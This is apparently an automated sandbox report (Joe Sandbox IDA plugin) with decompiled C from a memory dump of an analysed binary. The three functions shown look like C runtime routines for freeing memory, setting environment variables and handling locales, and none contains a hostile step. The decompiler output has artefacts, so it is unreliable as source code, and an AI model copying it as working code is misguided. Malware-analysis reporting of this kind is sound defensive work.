0x00000000
0x013914a9
0x0139131c
0x013912eb
0x01391296
0x01391299
0x013912ad
0x013912af
0x013912d0
0x013912d3
0x013912d6
0x013912d9
0x00000000
0x013912d9
0x00000000
0x0139129b
0x0139129b
0x0139129e
0x013912a1
0x00000000
0x013912a1
0x01391299
0x0139124e
0x01391253
0x0139125b
0x00000000
0x013911eb
0x013911f0
0x013911f3
0x013911f8
0x01391582
0x00000000
0x01391582

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70823901d9f97f355613b3acd82f5aa8269a913c1cebcc6300942281a6d0f7c
Instruction ID: eef89a184e1361368caf1938787582680f9a3660de3feace9d7b55770c9cec98
Opcode Fuzzy Hash: a70823901d9f97f355613b3acd82f5aa8269a913c1cebcc6300942281a6d0f7c
Instruction Fuzzy Hash: 67C1E670A0424BAFDF21EF9CD980BADBBB5BF59328F454159E911BB381C7349942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0138E134 Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0138E134(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E013858A2(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0138871A(4);
						_t120 = 0;
						_v8 = _t125;
						E013871B2(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x13a3070; // 0x13a30c4
								 *_t93 = _t53;
								_t54 =  *0x13a3074; // 0x14a5a5c
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x13a3078; // 0x14a5a5c
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x13a30a0; // 0x13a30c8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x13a30a4; // 0x14a5a60
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0138871A(4);
							_v12 = _t121;
							E013871B2(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E0138B24B(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E0138B24B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E0138B24B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E0138B24B(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E0138B24B(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E0138E0CB(_t93);
								E013871B2(_t93);
								E013871B2(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E013871B2(_v8);
								return _v16;
							}
							E013871B2();
							goto L12;
						}
						E013871B2(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x13a3070;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E013871B2( *((intOrPtr*)(_t123 + 0x7c)));
							E013871B2( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x0138e134
0x0138e13e
0x0138e144
0x0138e147
0x0138e150
0x0138e16f
0x0138e177
0x0138e17d
0x0138e190
0x0138e191
0x0138e19a
0x0138e19c
0x0138e19f
0x0138e1a2
0x0138e1ab
0x0138e1bc
0x0138e1be
0x0138e1c7
0x0138e316
0x0138e31b
0x0138e31d
0x0138e322
0x0138e325
0x0138e32a
0x0138e32d
0x0138e332
0x0138e335
0x0138e33a
0x0138e2a9
0x0138e2af
0x0138e2b3
0x0138e2b5
0x0138e2b5
0x00000000
0x0138e2b3
0x0138e1d4
0x0138e1d8
0x0138e1db
0x0138e1e2
0x0138e1e5
0x0138e1f2
0x0138e1f8
0x0138e204
0x0138e209
0x0138e218
0x0138e21f
0x0138e22c
0x0138e240
0x0138e24a
0x0138e261
0x0138e28d
0x0138e29d
0x0138e29d
0x0138e2a1
0x00000000
0x00000000
0x0138e292
0x0138e292
0x0138e298
0x0138e304
0x0138e29c
0x0138e29c
0x00000000
0x0138e29c
0x0138e306
0x0138e308
0x0138e308
0x0138e30b
0x0138e30d
0x0138e310
0x00000000
0x0138e314
0x0138e29a
0x00000000
0x0138e29a
0x0138e2a3
0x0138e2a6
0x00000000
0x0138e2a6
0x0138e264
0x0138e26a
0x0138e272
0x0138e27a
0x0138e27e
0x0138e282
0x00000000
0x0138e28a
0x0138e1e7
0x00000000
0x0138e1ec
0x0138e1ae
0x00000000
0x0138e1b6
0x00000000
0x0138e15a
0x0138e15a
0x0138e15c
0x0138e15f
0x0138e2b7
0x0138e2b7
0x0138e2bf
0x0138e2c1
0x0138e2c1
0x0138e2c9
0x0138e2ce
0x0138e2d2
0x0138e2d7
0x0138e2e2
0x0138e2e8
0x0138e2d2
0x0138e2ec
0x0138e2f1
0x0138e2f7
0x00000000
0x0138e2f7

APIs

_free.LIBCMT ref: 0138E1A2
_free.LIBCMT ref: 0138E1AE
_free.LIBCMT ref: 0138E2D7
_free.LIBCMT ref: 0138E2E2

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0191d6acdab9f5438aca7615a9a413483fef4baa5fae14b50763150f28b244ae
Instruction ID: d033f3a63f552a4e0e64021a5ba1e2fa6bcadb2d30af56bdd070e338551ee068
Opcode Fuzzy Hash: 0191d6acdab9f5438aca7615a9a413483fef4baa5fae14b50763150f28b244ae
Instruction Fuzzy Hash: 1E61C371900706AFDB21FF6CC840BAAB7FAFF44714F604569E955EB681E7709940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0138D5D9 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0138D5D9(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E013933E0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E0137FD24(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x14a5cd8 - _t110; // 0xa7f6f8
							if(__eflags != 0) {
								L14:
								_t64 =  *0x14a5cd8; // 0xa7f6f8
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E0138D8E1(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E0138FEDA(_t120, _t139, 4);
													E013871B2(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E013871B2( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E0138FEDA(_t139, _t138, 4);
												E013871B2(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x14a5cd8 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E013858A2(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E013871B2(_t149);
													goto L40;
												} else {
													_t76 = E01385138(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E0138016C();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E013858A2(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E013824F9(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E013871B2(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E013858A2(_t53, 1);
																		E013871B2(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E01385138( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E0138016C();
																				asm("int3");
																				_t84 =  *0x14a5cd8; // 0xa7f6f8
																				__eflags = _t84 -  *0x14a5ce4; // 0xa7f6f8
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x14a5cd8 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E01392044(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E0137FD24(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x14a5cd8 = E013858A2(1, 4);
										E013871B2(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x14a5cd8 - _t110; // 0xa7f6f8
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x14a5cdc - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x14a5cdc = E013858A2(1, 4);
												E013871B2(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x14a5cdc - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E013871B2(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x14a5cdc - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L01382FE9();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E0137FD24(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x0138d5d9
0x0138d5dc
0x0138d5de
0x0138d5e2
0x0138d5e5
0x0138d5e7
0x0138d5fc
0x0138d601
0x0138d603
0x0138d608
0x0138d60d
0x0138d60f
0x0138d7f0
0x0138d7f5
0x00000000
0x0138d615
0x0138d615
0x0138d617
0x00000000
0x0138d61d
0x0138d620
0x0138d623
0x0138d628
0x0138d62a
0x0138d630
0x0138d6ad
0x0138d6ad
0x0138d6b2
0x0138d6b5
0x0138d6b7
0x00000000
0x0138d6bd
0x0138d6c4
0x0138d6c9
0x0138d6ce
0x0138d6d1
0x0138d6d3
0x0138d724
0x0138d724
0x0138d727
0x00000000
0x0138d72d
0x0138d72d
0x0138d72f
0x0138d732
0x0138d732
0x0138d735
0x0138d737
0x00000000
0x0138d73d
0x0138d73d
0x0138d743
0x00000000
0x0138d749
0x0138d753
0x0138d756
0x0138d75b
0x0138d75e
0x0138d761
0x0138d763
0x00000000
0x0138d769
0x0138d769
0x0138d76c
0x0138d76e
0x0138d771
0x00000000
0x0138d771
0x0138d763
0x0138d743
0x0138d737
0x0138d6d5
0x0138d6d5
0x0138d6d7
0x00000000
0x0138d6d9
0x0138d6dc
0x0138d6e2
0x0138d6e5
0x0138d6e8
0x0138d71d
0x0138d71f
0x0138d6ea
0x0138d6ea
0x0138d6f7
0x0138d6f7
0x0138d6fa
0x00000000
0x00000000
0x0138d6f3
0x0138d6f6
0x0138d6f6
0x0138d6f6
0x0138d706
0x0138d709
0x0138d70e
0x0138d711
0x0138d714
0x0138d716
0x0138d775
0x0138d775
0x0138d775
0x0138d716
0x0138d77a
0x0138d77d
0x00000000
0x0138d77f
0x0138d77f
0x0138d782
0x0138d782
0x0138d784
0x0138d785
0x0138d785
0x0138d791
0x0138d799
0x0138d79c
0x0138d79d
0x0138d79f
0x0138d7e7
0x0138d7e8
0x00000000
0x0138d7a1
0x0138d7a8
0x0138d7ad
0x0138d7b0
0x0138d7b2
0x0138d80c
0x0138d80d
0x0138d80e
0x0138d80f
0x0138d810
0x0138d811
0x0138d816
0x0138d819
0x0138d81d
0x0138d81e
0x0138d821
0x0138d823
0x0138d82a
0x0138d82c
0x0138d82e
0x0138d830
0x0138d832
0x0138d832
0x0138d835
0x0138d836
0x0138d836
0x0138d832
0x0138d83c
0x0138d847
0x0138d84a
0x0138d84b
0x0138d84d
0x0138d8b5
0x0138d8b5
0x00000000
0x0138d84f
0x0138d84f
0x0138d851
0x0138d853
0x0138d8a5
0x0138d8a7
0x0138d8ad
0x00000000
0x0138d855
0x0138d855
0x0138d858
0x0138d858
0x0138d85a
0x0138d85a
0x0138d85a
0x0138d85d
0x0138d85d
0x0138d85f
0x0138d860
0x0138d860
0x0138d868
0x0138d86c
0x0138d876
0x0138d879
0x0138d87e
0x0138d881
0x0138d885
0x00000000
0x0138d887
0x0138d88f
0x0138d894
0x0138d897
0x0138d899
0x0138d8ba
0x0138d8bc
0x0138d8bd
0x0138d8be
0x0138d8bf
0x0138d8c0
0x0138d8c1
0x0138d8c6
0x0138d8c7
0x0138d8cc
0x0138d8d2
0x0138d8d4
0x0138d8d5
0x0138d8db
0x00000000
0x0138d8db
0x0138d8e0
0x00000000
0x00000000
0x00000000
0x0138d899
0x00000000
0x0138d89b
0x0138d89b
0x0138d89e
0x0138d8a0
0x0138d8a0
0x00000000
0x0138d8a4
0x0138d853
0x0138d825
0x0138d825
0x0138d825
0x0138d827
0x0138d829
0x0138d829
0x0138d7b4
0x0138d7c5
0x0138d7c9
0x0138d7d5
0x0138d7d7
0x0138d7d9
0x0138d7de
0x0138d7de
0x0138d7e1
0x0138d7e1
0x00000000
0x0138d7d7
0x0138d7b2
0x0138d79f
0x0138d77d
0x0138d6d7
0x0138d6d3
0x0138d632
0x0138d632
0x0138d635
0x0138d653
0x0138d653
0x0138d656
0x0138d669
0x0138d66e
0x0138d673
0x0138d676
0x0138d67c
0x0138d7fb
0x0138d7fb
0x0138d7fb
0x00000000
0x0138d682
0x0138d682
0x0138d688
0x00000000
0x0138d68a
0x0138d694
0x0138d699
0x0138d69e
0x0138d6a1
0x0138d6a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0138d6a7
0x0138d688
0x0138d658
0x0138d658
0x0138d7fe
0x0138d7ff
0x0138d806
0x00000000
0x0138d808
0x0138d637
0x0138d637
0x0138d63d
0x00000000
0x0138d63f
0x0138d644
0x0138d646
0x00000000
0x0138d64c
0x0138d64c
0x00000000
0x0138d64c
0x0138d646
0x0138d63d
0x0138d635
0x0138d630
0x0138d617
0x0138d5e9
0x0138d5e9
0x0138d5ee
0x0138d5f4
0x0138d809
0x0138d80b
0x0138d80b
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 0138D603
_free.LIBCMT ref: 0138D6DC
_free.LIBCMT ref: 0138D709

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: e92240527c5b8ca70f54551c11d39af7d38cc760c163dadd6f2ce94e323ab4cd
Instruction ID: 25ad9b070502f4437466301f85c48d4396b824e78869b8af9d7777859ec0064f
Opcode Fuzzy Hash: e92240527c5b8ca70f54551c11d39af7d38cc760c163dadd6f2ce94e323ab4cd
Instruction Fuzzy Hash: CB51E371904386AFEF31BFFC8880A6D7FB9AF0132CF54416AEA559B2C1EA358540CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0138435D Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0138435D(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E01385D71(__ecx, __edx) + 0x278;
				_t163 = E01383A48(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E0138871A(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E0138B4FE(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E0138016C();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E013884AC(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E01383765(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E0138B3FB(__eflags, _v704, 1, 0x1397188, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E01379981( &_v528,  *0x13a3194, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
